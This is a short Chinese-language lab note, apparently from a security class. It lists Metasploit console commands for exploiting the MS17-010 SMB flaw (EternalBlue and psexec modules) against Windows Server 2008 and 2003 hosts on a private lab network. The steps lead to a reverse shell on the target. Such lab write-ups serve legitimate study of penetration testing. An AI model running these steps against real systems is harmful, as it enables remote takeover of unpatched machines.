寫在前面：

老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本，否則拿這個去攻擊Windows Server 2003就會出現Exploit completed,but no session was created.這種情況。

ms17-010：exploit/windows/smb/ms17_010_enternalblue —>Windows Server 2008（終端命令）

msfconsole

search ms17-010

useexploit/windows/smb/ms17_010_enternalblue

info（檢視幫助）

set rhosts 192.168.29.128（被攻擊主機IP）

set rport 445

show options

show options以後往下拉會有一個target，因為這裡只有一個0，所以我們不用set target，但是要是有好幾個就需要寫set target 0（選哪個寫哪個的數字）

再開啟一個終端用nmap掃描一下被攻擊主機445埠是否開啟

回到剛才那個終端，輸入exploit，就會創立一個反彈連結，再輸入命令檢視當前使用者以及IP，發現已經是被攻擊的主機的cmd

ms17-010：exploit/windows/smb/ms17_010_psexec —>Windows Server 2003（終端命令）

msfconsole

search ms17-010

use exploit/windows/smb/ms17_010_psexec

info

set rhosts 192.168.29.128（設定攻擊目標的IP地址）

set lhost 192.168.29.133（攻擊機ip地址）

set rport 445

set target 0

show options

這裡也需要用nmap掃描一下被攻擊的主機445是否開放，之前掃過了所以這裡不掃了~~~

exploit